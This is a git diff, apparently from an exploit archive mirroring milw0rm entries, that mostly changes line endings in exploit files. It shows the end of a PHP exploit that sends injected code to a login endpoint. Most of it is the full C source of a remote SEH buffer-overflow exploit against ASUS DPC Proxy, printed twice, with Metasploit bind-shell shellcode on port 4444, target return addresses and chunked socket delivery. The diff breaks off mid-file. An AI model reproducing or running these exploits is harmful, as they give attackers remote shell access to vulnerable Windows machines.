= "rconpass=" . $evilcode . 
"&setcookiesNULL=rconpass"; + +$pack = "POST /auth.w?redir= HTTP/1.1\r\n"; +$pack.= "Host: {$host}:{$port}\r\n"; +$pack.= "User-Agent: Mozilla/5.0\r\n"; +$pack.= "Accept: */*\r\n"; +$pack.= "Accept-Language: en-us,en;q=0.5\r\n"; +$pack.= "Accept-Encoding: gzip,deflate\r\n"; +$pack.= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; +$pack.= "Keep-Alive: 300\r\n"; +$pack.= "Connection: keep-alive\r\n"; +$pack.= "Content-Type: application/x-www-form-urlencoded\r\n"; +$pack.= "Content-Length: ". strlen($post) ."\r\n\r\n" . $post; + +echo "[~] Sending...\r\n"; + +$sock = @fsockopen($host, $port, $errno, $errstr, 10); + if ($errstr) + echo("[-] Can't connect {$host}:{$port}\r\n"); + else { + fputs($sock, $pack); + $tmp = fgets($sock,1024); + if(strstr($tmp, '<')) + echo "[-] Failed, you better try again.\r\n"; + else + echo "[+] Shellcode should be executed.\r\n"; + fclose($sock); + } +?> + +# milw0rm.com [2008-05-03] diff --git a/platforms/windows/remote/556.c b/platforms/windows/remote/556.c index e884df2df..63ed8acc5 100755 --- a/platforms/windows/remote/556.c +++ b/platforms/windows/remote/556.c @@ -576,6 +576,6 @@ WSACleanup(); printf(" Exploit JPEG file %s has been generated!\n", jpeg_filename); return(EXIT_SUCCESS); -} - -// milw0rm.com [2004-09-27] +} + +// milw0rm.com [2004-09-27] diff --git a/platforms/windows/remote/56.c b/platforms/windows/remote/56.c index 089c97d76..ae0d507ad 100755 --- a/platforms/windows/remote/56.c +++ b/platforms/windows/remote/56.c @@ -111,6 +111,6 @@ void main (int argc, char **argv) closesocket (s); WSACleanup(); return; -} - -// milw0rm.com [2003-07-14] +} + +// milw0rm.com [2003-07-14] diff --git a/platforms/windows/remote/5619.html b/platforms/windows/remote/5619.html index eac1d901c..ce45379b5 100755 --- a/platforms/windows/remote/5619.html +++ b/platforms/windows/remote/5619.html 
@@ -1,58 +1,58 @@ - - - - -Print me with table of links to execute calc.exe - - - - - -# milw0rm.com [2008-05-14] + + + + +Print me with table of links to execute calc.exe + + + + + +# milw0rm.com [2008-05-14] diff --git a/platforms/windows/remote/566.pl b/platforms/windows/remote/566.pl index 62ef351bf..fe3ef86e8 100755 --- a/platforms/windows/remote/566.pl +++ b/platforms/windows/remote/566.pl @@ -114,6 +114,6 @@ print "\n Shell on tcp port 28876.\n\n"; print "ET LoWNOISE 2004\n"; exit(1); } - - -# milw0rm.com [2004-10-04] + + +# milw0rm.com [2004-10-04] diff --git a/platforms/windows/remote/5681.html b/platforms/windows/remote/5681.html index 7f729d4c8..0d7f5aad8 100755 --- a/platforms/windows/remote/5681.html +++ b/platforms/windows/remote/5681.html @@ -1,176 +1,176 @@ - - - - - - - -# milw0rm.com [2008-05-27] + + + + + + + +# milw0rm.com [2008-05-27] diff --git a/platforms/windows/remote/5694.cpp b/platforms/windows/remote/5694.cpp index 311bed1bc..901e8ca75 100755 --- a/platforms/windows/remote/5694.cpp +++ b/platforms/windows/remote/5694.cpp 
@@ -1,584 +1,584 @@
-/* Dreatica-FXP crew
-*
-* ----------------------------------------
-* Target : ASUS DPC Proxy 2.0.0.16/2.0.0.24
-* ----------------------------------------
-* Exploit : ASUS DPC Proxy 2.0.0.16/2.0.0.19 Remote Buffer Overflow Exploit
-* Exploit date : 02.04.2008
-* Exploit writer : Heretic2 (heretic2x@gmail.com)
-* OS : Windows ALL
-* Crew : Dreatica-FXP
-* Location : http://www.milw0rm.com/
-* ----------------------------------------
-* Info : Sending long buufer(however the buffer should be send by chunks)
-* we obtain a SEH exploitation, due to server bytes stricts i decided
-* to use here a alphanumeric shellcodes and jumps.
-* ----------------------------------------
-* Thanks to:
-* 1. Luigi Auriemma ( http://aluigi.org )
-* 2. The Metasploit project ( http://metasploit.com )
-* 3. ALPHA 2: Zero-tolerance ( )
-* 4. Dreatica-FXP crew ( )
-************************************************************************************
-* This was written for educational purpose only. Use it at your own risk. Author will be not be
-* responsible for any damage, caused by that code.
-*/
-
-#include
-#include
-#include
-#include
-#include
-
-#pragma comment(lib,"ws2_32")
-
-
-void usage(char * s);
-void logo();
-void end_logo();
-void print_info_banner_line(const char * key, const char * val);
-
-void extract_ip_and_port( char * &remotehost, int * port, char * str);
-int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);
-
-int hr2_connect(char * remotehost, int port, int timeout);
-int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
-int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
-int execute(struct _buf * abuf, char * remotehost, int port);
-
-struct _buf
-{
- unsigned char * ptr;
- unsigned int size;
-};
-int construct_shellcode(int sh, struct _buf * shf, int target);
-int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
-
-
-
-
-// -----------------------------------------------------------------
-// XGetopt.cpp Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring);
-char *optarg; // global argument pointer
-int optind = 0, opterr; // global argv index
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-struct {
- const char * name;
- int length;
- char *shellcode;
-}shellcodes[]={
- { "BindShell on 4444",
- /*
- * windows/shell_bind_tcp - 696 bytes
- * http://www.metasploit.com
- * Encoder: x86/alpha_mixed
- * EXITFUNC=seh, LPORT=4444
- */
- 696,
- "\x89\xe6\xdb\xdd\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
- "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
- "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
- "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
- "\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38\x4a\x59\x4b\x4f\x4b"
- "\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b"
- "\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x45\x51\x4a"
- "\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
- "\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50"
- "\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x43\x44\x43\x37"
- "\x49\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47"
- "\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
- "\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
- "\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
- "\x4c\x49\x42\x4c\x46\x44\x45\x4c\x43\x51\x48\x43\x46\x51\x49"
- "\x4b\x42\x44\x4c\x4b\x51\x53\x50\x30\x4c\x4b\x51\x50\x44\x4c"
- "\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51"
- "\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
- "\x4e\x36\x42\x46\x51\x43\x45\x36\x42\x48\x50\x33\x47\x42\x45"
- "\x38\x44\x37\x44\x33\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50"
- "\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x49"
- "\x46\x51\x4f\x4d\x59\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58"
- "\x45\x52\x46\x35\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x4e"
- "\x39\x44\x49\x4b\x45\x4e\x4d\x50\x57\x4b\x4f\x4e\x36\x46\x33"
- "\x46\x33\x51\x43\x51\x43\x50\x53\x47\x33\x46\x33\x47\x33\x46"
- "\x33\x4b\x4f\x48\x50\x43\x56\x42\x48\x42\x31\x51\x4c\x45\x36"
- "\x51\x43\x4b\x39\x4d\x31\x4a\x35\x43\x58\x4e\x44\x44\x5a\x42"
- "\x50\x48\x47\x46\x37\x4b\x4f\x48\x56\x42\x4a\x42\x30\x50\x51"
- "\x50\x55\x4b\x4f\x4e\x30\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
- "\x49\x51\x47\x4b\x4f\x4e\x36\x51\x43\x50\x55\x4b\x4f\x4e\x30"
- "\x42\x48\x4a\x45\x51\x59\x4d\x56\x47\x39\x50\x57\x4b\x4f\x4e"
- "\x36\x50\x50\x46\x34\x50\x54\x46\x35\x4b\x4f\x48\x50\x4c\x53"
- "\x43\x58\x4b\x57\x42\x59\x49\x56\x42\x59\x50\x57\x4b\x4f\x48"
- "\x56\x51\x45\x4b\x4f\x4e\x30\x43\x56\x43\x5a\x43\x54\x42\x46"
- "\x43\x58\x45\x33\x42\x4d\x4b\x39\x4d\x35\x42\x4a\x46\x30\x51"
- "\x49\x51\x39\x48\x4c\x4c\x49\x4d\x37\x43\x5a\x50\x44\x4c\x49"
- "\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x50\x42\x46"
- "\x4d\x4b\x4e\x47\x32\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x50\x38"
- "\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e\x48\x33\x42"
- "\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x48\x56\x51\x4b\x46\x37"
- "\x51\x42\x50\x51\x50\x51\x50\x51\x42\x4a\x45\x51\x46\x31\x50"
- "\x51\x46\x35\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x4e\x39"
- "\x43\x35\x48\x4e\x50\x53\x4b\x4f\x4e\x36\x43\x5a\x4b\x4f\x4b"
- "\x4f\x47\x47\x4b\x4f\x48\x50\x4c\x4b\x51\x47\x4b\x4c\x4c\x43"
- "\x49\x54\x42\x44\x4b\x4f\x48\x56\x51\x42\x4b\x4f\x4e\x30\x42"
- "\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x50\x53\x4b\x4f\x48\x56"
- "\x4b\x4f\x48\x50\x41\x41"
-
- },
- {NULL, 0, NULL}
-};
-
-struct _target{
- const char *t ;
- unsigned long ret ;
-} targets[]=
-{
- {"ASUS DpcProxy 2.0.0.16/2.0.0.19", 0x0040273b },
- {"DOS/Crash/Debug/Test/Fun", 0x00400101 },
- {NULL, 0x00000000 }
-};
-
-// memory for buffers
-unsigned char payloadbuffer[10000], a_buffer[10000];
-long dwTimeout=5000;
-int timeout=5000;
-
-int main(int argc, char **argv)
-{
- char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100];
- int sh,port=623,itarget=0;
- struct _buf fshellcode, sbuffer;
-
- logo();
- if(argc<2)
- {
- usage(argv[0]);
- return -1;
- }
-
- WSADATA wsa;
- WSAStartup(MAKEWORD(2,0), &wsa);
- // set defaults
- sh=0;
- // ------------
-
- while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
- {
- switch (c)
- {
- case 'h':
- if (strchr(optarg,':')==NULL)
- {
- remotehost=optarg;
- }else
- {
- sscanf(strchr(optarg,':')+1, "%d", &port);
- remotehost=optarg;
- *(strchr(remotehost,':'))='\0';
- }
- break;
- case 't':
- sscanf(optarg, "%d", &itarget);
- itarget--;
- break;
- case 'T':
- sscanf(optarg, "%ld", &dwTimeout);
- break;
- default:
- usage(argv[0]);
- WSACleanup();
- return -1;
- }
- }
- if(remotehost == NULL)
- {
- printf(" [-] Please enter remotehost\n");
- end_logo();
- WSACleanup();
- return -1;
- }
- print_info_banner_line("Host", remotehost);
- sprintf(temp1, "%d", port);
- print_info_banner_line("Port", temp1);
- print_info_banner_line("Payload", shellcodes[sh].name);
-
- if(sh==0)
- {
- sprintf(temp1, "%d", 4444);
- print_info_banner_line("BINDPort", temp1);
- }
-
- printf(" # ------------------------------------------------------------------- # \n");
- fflush(stdout);
-
-
- memset(payloadbuffer, 0, sizeof(payloadbuffer));
- fshellcode.ptr=payloadbuffer;
- fshellcode.size=0;
-
- memset(a_buffer, 0, sizeof(a_buffer));
- sbuffer.ptr=a_buffer;
- sbuffer.size=0;
-
- if(!construct_shellcode(sh, &fshellcode, itarget))
- {
- end_logo();
- WSACleanup();
- return -1;
- }
-
- printf(" [+] Payload constructed\n");
-
- if(!construct_buffer(&fshellcode, itarget, &sbuffer))
- {
- printf(" [-] Buffer not constructed\n");
- end_logo();
- WSACleanup();
- return -1;
- }
- printf(" [+] Final buffer constructed\n");
-
-
- if(!execute(&sbuffer, remotehost, port))
- {
- printf(" [-] Buffer not sent\n");
- end_logo();
- WSACleanup();
- return -1;
- }
- printf(" [+] Buffer sent\n");
-
- end_logo();
- WSACleanup();
- return 0;
-}
-
-int construct_shellcode(int sh, struct _buf * shf, int target)
-{
- memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
- shf->size=shellcodes[sh].length;
- return 1;
-}
-
-
-char JMPX[] =
- // get ecx
- "\x89\xE6\xDB\xDD\xD9\x76\xF4\x59"
- // alphanum-decoder
- "\x49\x49\x49"
- "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"
- "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
- "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
- // encoded jump
- "\x59\x6f\x7a\x47\x41"
- // back jump
- "\x89\xE6\xDB\xDD\xD9\x76\xF4\x5f\x81\xef\xf8\x1a\x00\x00\xeb\xb3";
-
-int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf)
-{
- unsigned char * cp = sbuf->ptr;
- memset(cp, 'A', 1000);
- cp+=20;
- memcpy(cp, shf->ptr, shf->size);
- cp+=1000-20;
- memset(cp, 'B', 1000);
- cp+=1000;
- memset(cp, 'C', 1000);
- cp+=1000;
- memset(cp, 'D', 1000);
- cp+=1000;
- memset(cp, 'E', 1000);
- cp+=1000;
- memset(cp, 'F', 1000);
- cp+=1000;
- memset(cp, 'G', 1000-62-sizeof(JMPX)+1);
- cp+=1000-62-sizeof(JMPX)+1;
-
- // code to jump back
- memcpy(cp, JMPX,sizeof(JMPX)-1);
- cp+=sizeof(JMPX)-1;
-
- // next SEH record and back jump
- *cp++='\x90';
- *cp++='\x90';
- *cp++='\xeb';
- *cp++='\xec';
-
- // replace SEH
- *cp++ = (char)((targets[target].ret ) & 0xff);
- *cp++ = (char)((targets[target].ret >> 8) & 0xff);
- *cp++ = (char)((targets[target].ret >> 16) & 0xff);
- *cp++ = (char)((targets[target].ret >> 24) & 0xff);
-
- memset(cp, 'H', 1000);
- cp+=1000;
-
- sbuf->size=(int)(cp-sbuf->ptr);
- return 1;
-}
-
-
-void extract_ip_and_port( char * &remotehost, int * port, char * str)
-{
- if (strchr(str,':')==NULL)
- {
- remotehost=str;
- }else
- {
- sscanf(strchr(str,':')+1, "%d", port);
- remotehost=str;
- *(strchr(remotehost,':'))='\0';
- }
-}
-
-
-
-int hr2_connect(char * remotehost, int port, int timeout)
-{
- SOCKET s;
- struct hostent *host;
- struct sockaddr_in addr;
- TIMEVAL stTime;
- TIMEVAL *pstTime = NULL;
- fd_set x;
- int res;
-
- if (INFINITE != timeout)
- {
- stTime.tv_sec = timeout / 1000;
- stTime.tv_usec = timeout % 1000;
- pstTime = &stTime;
- }
-
- host = gethostbyname(remotehost);
- if (!host) return SOCKET_ERROR;
-
- addr.sin_addr = *(struct in_addr*)host->h_addr;
- addr.sin_port = htons(port);
- addr.sin_family = AF_INET;
-
- s = socket(AF_INET, SOCK_STREAM, 0);
- if (s == SOCKET_ERROR)
- {
- closesocket(s);
- return SOCKET_ERROR;
- }
-
- unsigned long l = 1;
- ioctlsocket( s, FIONBIO, &l ) ;
-
- connect(s, (struct sockaddr*)&addr, sizeof(addr));
-
- FD_ZERO(&x);
- FD_SET(s, &x);
-
- res = select(NULL,NULL,&x,NULL,pstTime);
- if(res< 0) return SOCKET_ERROR;
- if(res==0) return 0;
- return (int)s;
-}
-
-
-int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
-{
- return send(s, (char *)buf, len, 0);
-}
-
-int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
-{
- TIMEVAL stTime;
- TIMEVAL *pstTime = NULL;
- fd_set xy;
- int res;
-
- if (INFINITE != timeout)
- {
- stTime.tv_sec = timeout / 1000;
- stTime.tv_usec = timeout % 1000;
- pstTime = &stTime;
- }
- FD_ZERO(&xy);
- FD_SET(s, &xy);
-
- res = select(NULL,&xy,NULL,NULL,pstTime);
-
- if(res==0) return 0;
- if(res<0) return -1;
-
- return recv(s, (char *)buf, len, 0);
-}
-
-int execute(struct _buf * abuf, char * remotehost, int port)
-{
- int x;
- SOCKET s ;
- unsigned char rbuf[7000];
- unsigned int i;
- int rsize=7000;
- s = hr2_connect(remotehost, port, 10000);
- if(s==0)
- {
- printf(" [-] connect() timeout\n");
- return 0;
- }
- if(s==SOCKET_ERROR)
- {
- printf(" [-] Connection failed\n");
- return 0;
- }
-
- x = hr2_tcprecv(s, rbuf, 5000, 10000);
- x = hr2_tcprecv(s, rbuf, 5000, 10000);
-
- for(i=0;isize/1000;i++)
- {
- printf(" [+] Chunk %d/%d sent\n", i+1,abuf->size/1000);
- x = hr2_tcpsend(s, abuf->ptr+1000*i, 1000, 0);
- if(x<1000) return -1;
- Sleep(1000);
- x = hr2_tcprecv(s, rbuf, 5000, 10000);
- }
- return 1;
-}
-
-
-// -----------------------------------------------------------------
-// XGetopt.cpp Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring)
-{
- static char *next = NULL;
- if (optind == 0)
- next = NULL;
-
- optarg = NULL;
-
- if (next == NULL || *next == '\0')
- {
- if (optind == 0)
- optind++;
-
- if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
- {
- optarg = NULL;
- if (optind < argc)
- optarg = argv[optind];
- return EOF;
- }
-
- if (strcmp(argv[optind], "--") == 0)
- {
- optind++;
- optarg = NULL;
- if (optind < argc)
- optarg = argv[optind];
- return EOF;
- }
-
- next = argv[optind];
- next++; // skip past -
- optind++;
- }
-
- char c = *next++;
- char *cp = strchr(optstring, c);
-
- if (cp == NULL || c == ':')
- return '?';
-
- cp++;
- if (*cp == ':')
- {
- if (*next != '\0')
- {
- optarg = next;
- next = NULL;
- }
- else if (optind < argc)
- {
- optarg = argv[optind];
- optind++;
- }
- else
- {
- return '?';
- }
- }
-
- return c;
-}
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-void print_info_banner_line(const char * key, const char * val)
-{
- char temp1[100], temp2[100];
-
- memset(temp1,0,sizeof(temp1));
- memset(temp1, '\x20' , 58 - strlen(val) -1);
-
- memset(temp2,0,sizeof(temp2));
- memset(temp2, '\x20' , 8 - strlen(key));
- printf(" # %s%s: %s%s# \n", key, temp2, val, temp1);
-
-}
-
-
-
-void usage(char * s)
-{
- int j;
- printf("\n");
- printf(" Usage: %s -h -t \n", s);
- printf(" -------------------------------------------------------------------\n");
- printf(" Arguments:\n");
- printf(" -h ........ host to attack, default port: 623\n");
- printf(" -t ........ target to use\n");
- printf(" -T ........ socket timeout\n");
- printf("\n");
- printf(" Supported ASUS DPCProxy versions:\n");
- for(j=0; targets[j].t!=0;j++)
- {
- printf(" %d. %s\n",j+1, targets[j].t);
- }
- printf("\n");
- for(j=0; shellcodes[j].name!=0;j++)
- {
- printf(" %d. %s\n",j+1, shellcodes[j].name);
- }
- end_logo();
-}
-
-void logo()
-{
- printf("\n\n");
- printf(" ####################################################################### \n");
- printf(" # ____ __ _ ______ __ _____ #\n");
- printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n");
- printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n");
- printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n");
- printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n");
- printf(" # crew #\n");
- printf(" ####################################################################### \n");
- printf(" # Exploit : ASUS DPCPROXY Service 2.0.0.16-19 # \n");
- printf(" # Author : Heretic2 (http://www.dreatica.cl/) # \n");
- printf(" # Version : 1.0 # \n");
- printf(" # System : Windows ALL # \n");
- printf(" # Date : 02.04.2008 - 04.04.2008 # \n");
- printf(" # ------------------------------------------------------------------- # \n");
-}
-
-void end_logo()
-{
- printf(" # ------------------------------------------------------------------- # \n");
- printf(" # Dreatica-FXP crew [Heretic2] # \n");
- printf(" ####################################################################### \n\n");
-}
-
-// milw0rm.com [2008-05-29]
+/* Dreatica-FXP crew
+*
+* ----------------------------------------
+* Target : ASUS DPC Proxy 2.0.0.16/2.0.0.24
+* ----------------------------------------
+* Exploit : ASUS DPC Proxy 2.0.0.16/2.0.0.19 Remote Buffer Overflow Exploit
+* Exploit date : 02.04.2008
+* Exploit writer : Heretic2 (heretic2x@gmail.com)
+* OS : Windows ALL
+* Crew : Dreatica-FXP
+* Location : http://www.milw0rm.com/
+* ----------------------------------------
+* Info : Sending long buufer(however the buffer should be send by chunks)
+* we obtain a SEH exploitation, due to server bytes stricts i decided
+* to use here a alphanumeric shellcodes and jumps.
+* ----------------------------------------
+* Thanks to:
+* 1. Luigi Auriemma ( http://aluigi.org )
+* 2. The Metasploit project ( http://metasploit.com )
+* 3. ALPHA 2: Zero-tolerance ( )
+* 4. Dreatica-FXP crew ( )
+************************************************************************************
+* This was written for educational purpose only. Use it at your own risk. Author will be not be
+* responsible for any damage, caused by that code.
+*/
+
+#include
+#include
+#include
+#include
+#include
+
+#pragma comment(lib,"ws2_32")
+
+
+void usage(char * s);
+void logo();
+void end_logo();
+void print_info_banner_line(const char * key, const char * val);
+
+void extract_ip_and_port( char * &remotehost, int * port, char * str);
+int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);
+
+int hr2_connect(char * remotehost, int port, int timeout);
+int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
+int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
+int execute(struct _buf * abuf, char * remotehost, int port);
+
+struct _buf
+{
+ unsigned char * ptr;
+ unsigned int size;
+};
+int construct_shellcode(int sh, struct _buf * shf, int target);
+int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
+
+
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring);
+char *optarg; // global argument pointer
+int optind = 0, opterr; // global argv index
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+struct {
+ const char * name;
+ int length;
+ char *shellcode;
+}shellcodes[]={
+ { "BindShell on 4444",
+ /*
+ * windows/shell_bind_tcp - 696 bytes
+ * http://www.metasploit.com
+ * Encoder: x86/alpha_mixed
+ * EXITFUNC=seh, LPORT=4444
+ */
+ 696,
+ "\x89\xe6\xdb\xdd\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
+ "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+ "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+ "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+ "\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38\x4a\x59\x4b\x4f\x4b"
+ "\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b"
+ "\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x42\x58\x45\x51\x4a"
+ "\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
+ "\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50"
+ "\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x43\x44\x43\x37"
+ "\x49\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47"
+ "\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
+ "\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
+ "\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b"
+ "\x4c\x49\x42\x4c\x46\x44\x45\x4c\x43\x51\x48\x43\x46\x51\x49"
+ "\x4b\x42\x44\x4c\x4b\x51\x53\x50\x30\x4c\x4b\x51\x50\x44\x4c"
+ "\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51"
+ "\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
+ "\x4e\x36\x42\x46\x51\x43\x45\x36\x42\x48\x50\x33\x47\x42\x45"
+ "\x38\x44\x37\x44\x33\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50"
+ "\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x49"
+ "\x46\x51\x4f\x4d\x59\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58"
+ "\x45\x52\x46\x35\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x4e"
+ "\x39\x44\x49\x4b\x45\x4e\x4d\x50\x57\x4b\x4f\x4e\x36\x46\x33"
+ "\x46\x33\x51\x43\x51\x43\x50\x53\x47\x33\x46\x33\x47\x33\x46"
+ "\x33\x4b\x4f\x48\x50\x43\x56\x42\x48\x42\x31\x51\x4c\x45\x36"
+ "\x51\x43\x4b\x39\x4d\x31\x4a\x35\x43\x58\x4e\x44\x44\x5a\x42"
+ "\x50\x48\x47\x46\x37\x4b\x4f\x48\x56\x42\x4a\x42\x30\x50\x51"
+ "\x50\x55\x4b\x4f\x4e\x30\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
+ "\x49\x51\x47\x4b\x4f\x4e\x36\x51\x43\x50\x55\x4b\x4f\x4e\x30"
+ "\x42\x48\x4a\x45\x51\x59\x4d\x56\x47\x39\x50\x57\x4b\x4f\x4e"
+ "\x36\x50\x50\x46\x34\x50\x54\x46\x35\x4b\x4f\x48\x50\x4c\x53"
+ "\x43\x58\x4b\x57\x42\x59\x49\x56\x42\x59\x50\x57\x4b\x4f\x48"
+ "\x56\x51\x45\x4b\x4f\x4e\x30\x43\x56\x43\x5a\x43\x54\x42\x46"
+ "\x43\x58\x45\x33\x42\x4d\x4b\x39\x4d\x35\x42\x4a\x46\x30\x51"
+ "\x49\x51\x39\x48\x4c\x4c\x49\x4d\x37\x43\x5a\x50\x44\x4c\x49"
+ "\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x50\x42\x46"
+ "\x4d\x4b\x4e\x47\x32\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x50\x38"
+ "\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e\x48\x33\x42"
+ "\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x48\x56\x51\x4b\x46\x37"
+ "\x51\x42\x50\x51\x50\x51\x50\x51\x42\x4a\x45\x51\x46\x31\x50"
+ "\x51\x46\x35\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x4e\x39"
+ "\x43\x35\x48\x4e\x50\x53\x4b\x4f\x4e\x36\x43\x5a\x4b\x4f\x4b"
+ "\x4f\x47\x47\x4b\x4f\x48\x50\x4c\x4b\x51\x47\x4b\x4c\x4c\x43"
+ "\x49\x54\x42\x44\x4b\x4f\x48\x56\x51\x42\x4b\x4f\x4e\x30\x42"
+ "\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x50\x53\x4b\x4f\x48\x56"
+ "\x4b\x4f\x48\x50\x41\x41"
+
+ },
+ {NULL, 0, NULL}
+};
+
+struct _target{
+ const char *t ;
+ unsigned long ret ;
+} targets[]=
+{
+ {"ASUS DpcProxy 2.0.0.16/2.0.0.19", 0x0040273b },
+ {"DOS/Crash/Debug/Test/Fun", 0x00400101 },
+ {NULL, 0x00000000 }
+};
+
+// memory for buffers
+unsigned char payloadbuffer[10000], a_buffer[10000];
+long dwTimeout=5000;
+int timeout=5000;
+
+int main(int argc, char **argv)
+{
+ char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100];
+ int sh,port=623,itarget=0;
+ struct _buf fshellcode, sbuffer;
+
+ logo();
+ if(argc<2)
+ {
+ usage(argv[0]);
+ return -1;
+ }
+
+ WSADATA wsa;
+ WSAStartup(MAKEWORD(2,0), &wsa);
+ // set defaults
+ sh=0;
+ // ------------
+
+ while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
+ {
+ switch (c)
+ {
+ case 'h':
+ if (strchr(optarg,':')==NULL)
+ {
+ remotehost=optarg;
+ }else
+ {
+ sscanf(strchr(optarg,':')+1, "%d", &port);
+ remotehost=optarg;
